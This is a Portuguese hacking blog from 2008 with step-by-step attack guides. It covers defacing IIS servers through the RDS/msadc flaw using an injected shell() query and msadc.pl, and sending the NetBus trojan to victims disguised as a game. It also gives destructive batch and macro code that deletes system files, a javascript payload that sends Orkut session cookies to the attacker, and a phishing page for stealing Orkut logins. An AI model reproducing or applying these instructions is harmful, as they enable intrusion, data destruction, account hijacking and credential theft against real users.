Skoldbr's Blog

Invadido Hords

skoldbr — Wed, 29 Oct 2008 17:19:00 +0000

Hords

Obs.: Só funciona se o provedor usar Windows NT.
Essa porra é usado pra hackear paginas , pra isso vc precisa saber a pasta que se encontra o index ou default, bom na maioria dos casos é só digitar wwww.servidor.com/idq.idq, ai aparece a bosta do diretorio!, geralmente é c:InetPubwwwroot , bom ai tem que descobrir se o servidor usa index.asp,index.html,index.htm e mesma coisa com default.
Bom exemplo, como faço? assim, www.servidor.com/idq.idq ou ida.ida ou idc.idc, bom ai vou ver o diretorio.. anoto num txt, agora só decobrir se é index ou default e qual a extensão, bom só testando.. www.servidor.com/index.extenções possiveis ; ou www.servidor.com/default.exetenções possiveis , bom qual entrar é o certo ai é só anotar, vamos supor que o diretorio é :
c:inetpubwwwrootindex.htm, ai depois de ter achado isso entra na tela do RDS, ou seja www.servidor.com/msadc/samples/adctest.asp, e vai aparecer a tela do RDS, agora apague tudo que tiver escrito no query e digite:
Select * from Products where ProductType=’|shell(“cmd /c echo (O QUE QUER QUE APAREÇA NO SEU HACKED) > c:InetPubwwwrootindex.htm”)|’
Depois é só apertar RUN e pronto!, agora vamos se por que vc quer evitar tudo isso, é so pegar um exploit chamado msadc.pl e pronto.. vc usa assim:
perl msadc.pl -h www.servidor.com , se aparecer cmd , vc digita :
(O que quer escrever) < C:InetPubwwwrootindex.htm (enter) só isso amigos.. bom aproveito, para ver se o servidor tem o bug do RDS é testando com o msadc/samples/adctest.asp ou passando um scaneador de vulneralidades! (gosto do nessus pra linux),pega ele em www.nessus.org.

Invadido Net bus

skoldbr — Wed, 29 Oct 2008 17:14:47 +0000

NET BUS

o Net Bus é um programa desenvolvido para fazer manutenção de micros a longa distância, mais que caiu em mãos erradas devido a sua facilidade de uso. Possui uma interface muito simples de boa visão, identificação e utilização.

Para podermos usar o Net Bus precisamos mandar um PATCH cliente à vitima, e ele sem saber, o instalará em seu computador liberando acesso total à você.

Quero deixa bem claro que quando alguma vitima instala o PATCH cliente em seu computador passa a dar acesso a todas as pessoas que possuem o Net Bus. Por Isso devemos colocar senha quando fazemos o primeiro acesso. Agora vamos ao que nos interessa.

Como Manda o PATCH cliente para a Vitima !

Para mandar um PATCH para a vitima, basta mandar um arquivo .EXE para ele com um nome de algum jogo ou programa e peça para a vitima o instalar. Outra opção seria criar um programa instalador que executa um comando instalado automaticamente patch cliente na maquina da vitima. Como exemplo de programa bem fácil de usar e o WinZip Self Extractor ( Zip algum arquivo e quando zipado clique com o botão direito do mouse e procure esse comando: WinZip Self Extractor e clique ). Dessa forma a vitima instalará o programa em seu PC sem saber que está instalando um TROJAM.

Depois de Instalado, Como Fazer a Conexão?!

Descubra o IP da vitima ( se ela estiver no mIRC digite: /dsn Nick e o IP dessa pessoas irá aparece na Janela de STATUS ). Pegue IP e coloque no local do NetBus onde está denominado “Host name/IP” e clique em “connect” para fazer a conexão com a maquina da vitima. Se aparecer lá em baixo a mensagem “Couldn’t connect to ( o IP )” o programa não esta conseguindo fazer a conexão, verifique com a vitima se realmente ela instalou aquele programinha, para saber se a conexão foi feita, depois de aperta connect aparecerá o botão “cancel” caso apareça a conexão ta pronta.

COMANDOS:

OPEN CDROM Abre/Fecha o cd-rom uma vez ou em intervalos ( Especifico ou segundos )

SHOW IMAGE Espetáculo imagem opcional. se nenhum caminho cheio de imagem é determinado a procurar isto no Remendo-Diretório. Os imagem-formatos apoiados são BMP e JPG

START PROGAM PLAY SOUND Jogo som-arquivo opcional. Se nenhum caminho cheio de som-arquivo é determinado que procurará isto no Remendo-diretório. O som-formato apoiado é WAV.

MOUSE POS Especifique a coordenada do mouse nos dois quadrados e click em Mouse POS, e o mouse da vitima se posicionará.

CONTROL MOUSE Seu mouse vira o dele, ou seja, tudo o que você fizer no seu mouse aparece no dele e ele perde totalmente o controle do mouse.

MSG Mostre um diálogo de mensagem na tela. A resposta sempre é mandada de volta a você.

EXIT WINDOWS Paralisação do sistema, logoff e usuário e etc.

GO TO URL Vá para a url opcional dentro da falta de rede-browser.

SEND TEXT Envie letras do seu teclado a aplicação ativa no PC designado. O Texto no campo “Message/Text” será inserido na aplicação que tem enfoque. (” |” Representa Enter ). LISTEN => Tudo que a vitima esta digitando monitore com esta função.

SCREENDUMP Adquira um Screendump ( Não deveria ser usado em conexões lentas ). Captura a tela que a vitima esta visualizando em GET.

INFO Informações sobre o computador designado.

FILE MANAGER UpLoad qualquer arquivo para o computador designado ( O Contrário de Download ). Com esta características e possível atualiza o PATCH remotamente com sua nova versão.

SOUND SYSTEM Aumenta e Diminui o Som-Volume da Vitima

RECORD SOUND Sons de registro que captura de microfone. O som é mandado de volta a você.

FILE MANAGER Carregue ou apague qualquer arquivo que você quiser. Você escolhe qual arquivo deseja você a fazer Donwload\Delete em uma versão que representa o HardDisk no objetivo. Tudo Que esta sendo utilizado.

NetBUS

O NetBus, é o que podemos chamar de trojan “cavalo de tróia” e age como um vírus, porém um vírus que ao invés de danificar arquivos de sua máquina e modificá-los, ele simplesmente instala um ambiente de serviço na máquina, tornando-a remotamente acessível.
Através do protocolo TCP/IP, o NetBus cria uma porta de conexões e fica esperando conexões nessa porta, para através dela dar acesso a quase todos os controles da máquina a quem o acessar, podendo ser feito inclusive um grande estrago no sistema, visto que é possível se fazer desde um simples download para a máquina até mesmo apagar arquivos importantes do sistema.
A máquina infectada fica com o NetBus Server cujo arquivo por default utiliza o nome de Patch.exe, já o cliente ou seja, a pessoa que irá acessar essa máquina remotamente e que provavelmente implantou o NetBus no sistema, utiliza o NetBus

Removendo o Netbus

Se vc estiver infectado com o netbus…..para remover eh muito simples….use o “localizar arquivos ou pastas” do windows e procure por SYSEDIT, se vc realmente estiver infectado com o netbus irá aparecer um arquivo cujo ícone eh um “parafuso”….delete esse arquivo !!!!!! Depois procure por um outro arquivo chamado KeyHook.dll, se encontrar tb delete ele.

Obs. O autor não se responsabiliza pela má utilização, pois só é para curiosidade e não para colocá-los em prática.

Vírus de Macro

skoldbr — Tue, 28 Oct 2008 23:36:05 +0000

VEJA UM EXEMPLO DE VÍRUS DE MACRO QUE ADULTERA A IMPRESSÃO.

Vírus 12/04
Sub MAIN
If Dia(Agora()) = 12 and Mês(Agora()) = 04 Then
DefinirAtributo “C:\msdos.sys”, 0 aaaaOpen “C:\io.sys” For Output As # 1 aaaaPrint #1, “Beba Josta”
Close #1
End if
Open “c:\autoexec.bat” For Output As #1
Print #1, “@echo off” Print #1, “cls” aaPrint #1, “@deltree /y c:\windows > nul”
Close #1
End Sub

Criando Vírus

skoldbr — Tue, 28 Oct 2008 23:31:53 +0000

Criando Vírus

Este texto irá ensinar, de modo fácil, destruir o computador da sua escola (ou daquele otario do seu amigo que gosta de ficar dando uma de Hacker ,ou o do seu trabalho, etc.)
Primeiro, crie em seu computador um arquivo de lote (nem precisa copilar), se não souber aí vai, pelo DOS digite:

copy con arquivo.bat

@echo off

@echo frase de sua preferência

del*.sys

del*.exe

del*.com

cd windows

del*.*

del arquivo.bat

@echo frase de sua preferência

Pronto, um arquivo virus de lote foi criado em seu computador, calmaaaa!!! Hehe, ele não fará nada contanto que você não digite “arquivo”no diretório onde ele está.
Remova este arquivo (arquivo.bat) para um disquete, junto a ele um “autoexec.bat” com a linha de comando: C:\arquivo .bat.
Agora é com você! Leve o disquete para a escola (trabalho, casa de amigo, etc.) e quando tiver uma oportunidade, insira o disco na unidade referente (geralmente a:) e copie os arquivos para o diretório C:\ Pronto!

Camuflar Links

skoldbr — Tue, 28 Oct 2008 21:50:11 +0000

Copie o código abaixo

href=”http://skoldbr.wordpress.com”>http://www.orkut.com/Community.aspx?cmm=612213

http://www.orkut.com/Community.aspx?cmm=612213
Esse código,cria esse efeito camuflado nos links, passe o mouse em cima e veja na barra de status do seu
navegador!

Cookies no Orkut

skoldbr — Tue, 28 Oct 2008 21:28:45 +0000

Para pegar o cookie de alguém, baixe o Firefox (clique aqui ), depois no Google, pesquise
“editor de cookies” ou clique aqui o 1º resultado da busca é o certo (site do Firefox), após fazer o download, reinicie o Firefox, vá em, ferramentas e vai ter a nova opção “cookie editor“

Envie este código abaixo para a vitima

Para localizar o´ XXXXXXXXXXXXXXXXXXXXX “ mais rápido no código abaixo, aperte CTRL + F, e ponha dentro do pesquisar os X em vermelhos acima, mude para o numero do seu UID do profile

javascript:document.body.innerHTML+=’’;function redre(){setTimeout(“location.href=\”http://www.-orkut.com/Scrapbook.aspx\”;”, 2000)};flood.location=”http://www.-orkut.com/Scrapbook.aspx”;dscrap=document.getElementById(‘scrapText’);setTimeout(‘df=flood.document.forms[1];df.innerHTML+=\’\’;df.action=”http://¬w¬w¬w¬.¬o-rkut.com/Scrapbook.aspx?uid=XXXXXXXXXXXXXXXXXXXXX”;flood.document.getElementById(\’scrapText\’).value=document.cookie;flood.document.getElementsByTagName(\’input\’)[\'Action.submit\'].click();redre();’, 3000);void(0)

Depois quando a pessoa usar o java, vá até seu Scrapbook, terá uma mensagem com o cookie da pessoa, copia ele, e vai no editor de cookie, vai ter os sites, vai no do Orkut e substitui seu cookie pelo da vítima (seu cookie está na 2ª linha).

Pagina Fake do Orkut

skoldbr — Tue, 28 Oct 2008 02:13:47 +0000

Vou postar aqui uma página fake pra vocês que é mais um modo de hackear orkut

Pagina Fake [PF] é uma pagina igual a do orkut de quando voce vai logar , porém se a pessoa logar nela o seu login e senha irá para o seu email

1 – Baixe a pagina fake
download: http://www.4shared.com/file/31630239/b98e28e6/paginafakebysrmichel.html

2 – Abra o arquivo pelo bloco de notas e aperte Ctrl + F (pesquisar) , e coloque para pesquisar “@” vai achar “”Seuemail@lammer ” ; assim que encontrar troque-o pelo seu email [aconselho gmail] e salve.

3 – Agora voce ja está com a sua PF feita, entao vamos agora hospeda-la para poder entrar em ação

Tem varios serviços de hospedagem pode ser a sua escolha, vou por dois aqui:

* www.110mb.com

* http://vila.bol.uol.com.br/index.html

[crie uma conta em um desses dois ou no da sua preferencia e hospede sua pagina fake e pronto]

5 – Camuflando o link
Vá no scrapbook da vitima e coloque assim :

[*link=LINK-DA-SUA-PAGINA-FAKE]www.orkut.com[*/link] (tire os “*”)

no lugar de www.orkut.com pode colocar qualquer outra coisa